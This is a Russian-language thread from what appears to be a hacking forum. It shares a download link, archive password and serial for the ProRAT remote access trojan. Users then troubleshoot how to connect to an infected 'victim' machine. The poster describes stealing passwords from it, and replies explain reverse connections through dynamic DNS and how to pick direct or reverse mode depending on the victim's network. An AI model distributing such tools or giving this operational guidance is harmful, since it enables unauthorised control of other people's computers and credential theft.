• XSS.stack #1 – первый литературный журнал от юзеров форума

ProRAT 1.9 SE

Obormot

floppy-диск
Пользователь
Регистрация
07.12.2006
Сообщения
5
Реакции
0
http://patriarch13.nm.ru/ProRat_SE_Fx18.zip

Про рэт 1,9 SE
zip pass: oksa52wq
user: mohdjase1
serial: 66618e869accfc4f96
. Если уже выкладывали - сори, не нашел.

И еще нужна помощь знающих. А имено :
Я собстоно ток вчера его скачал, и не разобрался тольком, Включаю ПроКонектив, враг онлайн, на ПроКонектив приходит сообщение, тип юзер онйлан - все ок!
Дальше открываю Сам клиент, ввожу пришедшый айпи (враг все ще в он лайн, он у меня в контакт листе), порт 5110, конект -- фиг! :mellow: долго думав пишет тип связь прервана
Потом произошло самое интересное, открыв окно проконектив, я пощелкал правой левой кнопкой на строке сообщения (картинка сменилась на трлеки в разные стороны, ну кароче кто юзал - думаю поймет) жму правой кнопкой там в ммаленком подменя жму, конект - ПОдконектился!! Снял пасы и т.д.

Но что самое обидное - произошел дисконект (враг оффлайн) после следующего входа сообщения на проконектив идет, а подконектися не получается..... Если вообить прямо в клиент аппи врага (серв на компе жерты 100% рабочий - ТО вообще глухо) и вот там как то настраивается тип
В чем проблема ?
Что значит Reverse connection ,
Connect direct, Connect Reverse , и т.д. (в меню если правой кнопкой по строке пришедшей на ПроКонектив)
В общем нид хелп по конекту к зараженному компу, хорошобы если бы кто-нибудь описал бы сам процес)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Реверс коннектион значит что "враг"" подцепится к тебе так скажем сам. т.е. соединение инициализируется с другой стороны.
 
poisons ясно )
Дак вот, с помощью этого ревирстного конекта я и подконектился каким-то образом походу :) , но повторить неполучалось.
Т.е. мне на Проконектив приходит что юзер он-лайн и в проконективе я ставлю чтоб серв ко мне сам конектился или как ?

Я так понял что подконектится напрямую через ИНЕТ не получится (через клиент), правильно ? Во влякмо случаем ниразу не получалось, на проконектив все приходит, в клиен вожу АйПи не конектится ((
 
1. давно паблик, выкладывали сотни раз
2.
Реверс коннектион значит что "враг"" подцепится к тебе так скажем сам. т.е. соединение инициализируется с другой стороны.
по хелпу я понял так, что это коннект через сторонние серверы, напрмиер комп конектиться к NoIp, а ты уже к нему
3. если нужно-сутчи: 7-8-9-22-66, помогу... очень долго его юзал для изучения слабых сторон винды:) так сказать:)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
муть. но-ип это просто сервис динамического днс( Security Networker'у надобы это знать).принцип работы в том что клиентская машина при входе в сеть сообщает ему свой ип и он соответственно на него редиректит, можно и дднс заюзать, да все что угодно, на вкус и цвет флоамастеры некоторые горчат). в реверс коннектион можешь хоть свой ип написать, если постоянный.
 
парни а кто сможет обяснить следующее...
Проконектив включен.
приходит
---------------------------------------------------------------------
| fgfdhJjjghjjJ [ IP ]
|---- Sergey [какой-то другой айпи] - жму конект ДИРЕКТ - НЕ КОНЕКТИТ, жму РЕверс конект -КОНЕКТИТ
---------------------------------------------------------------------
когда приходит:

-----------------------------------------------------------------------
fgfdhJjjghjjJ [ IP ] (развернуть нельзя) - жму конект директ КОНЕКТИТ
----------------------------------------------------------------------
бывает что в подменю (ну правой кнопкой на троке с айпи) Активна только КОНЕКТ ДИРЕКТ. БЫвает что активно все положения меню..... )))))))

Кароче я полностью запустался.
Кто сможет обяснить почему сообщения разные от одного пользоватетя, да и вообще что к чему ?? :mellow:
 
Сам отвечу на свой вопрос (мож проста кому-нить пригодится мануал так скачать) :)

Когда приходят оповещения на Проконектив в видА
| fgfdhJjjghjjJ [ WAN IP ]
|---- Sergey [LAN IP]

. - Значит у зараженного пользователя инет осеществляется через лок. сеть (выделенная линия). - В этом случае используется Реверсное соединение!


Когда приходят уведомления вида
fgfdhJjjghjjJ [ IP ]

- значит у зараженого пользователя инет осуществляется по средствам Диал-АП , ИДСЛЬ etс - используется прямое (Директ) соединение!

Только вот у меня почемута, когда конектишся к зараженому компа из локасли через реверс, конект рвется мин через 5, и больше подконектится не удается (только после след захода зараженной машины в инет) - почему, понять пока не могу ( :mellow:
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх